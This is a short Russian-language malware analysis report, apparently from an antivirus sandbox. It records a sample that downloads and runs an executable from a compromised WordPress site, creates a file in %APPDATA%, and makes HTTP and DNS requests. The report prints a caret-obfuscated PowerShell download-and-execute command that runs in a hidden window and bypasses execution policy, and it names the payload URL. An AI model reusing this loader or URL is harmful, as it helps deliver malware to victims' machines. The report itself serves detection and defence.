Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://nsholiday.com/wp-content/plugins/huwjzr/4dui5.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "P^Ow^ERSH^Ell^.^Ex^e^ -e^x^eCut^IOnPoL^I^c^y^ by^PAs^S^ ^-nOPRof^ile^ -w^In^doWStY^LE HI^dde^n (^ne^W-ob^j^ect sysTEM.net.W^e^BcLIE^N^T).DOW^n^loadFI^L^e^('http://nsholiday.com/wp-conte...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'ns###iday.com':80
TCP
Запросы HTTP GET
- http://ns###iday.com/wp-content/plugins/HUwjZr/4DUi5.exe
UDP
- DNS ASK ns###iday.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "P^Ow^ERSH^Ell^.^Ex^e^ -e^x^eCut^IOnPoL^I^c^y^ by^PAs^S^ ^-nOPRof^ile^ -w^In^doWStY^LE HI^dde^n (^ne^W-ob^j^ect sysTEM.net.W^e^BcLIE^N^T).DOW^n^loadFI^L^e^('http://nsholiday.com/wp-conte...' (со скрытым окном)
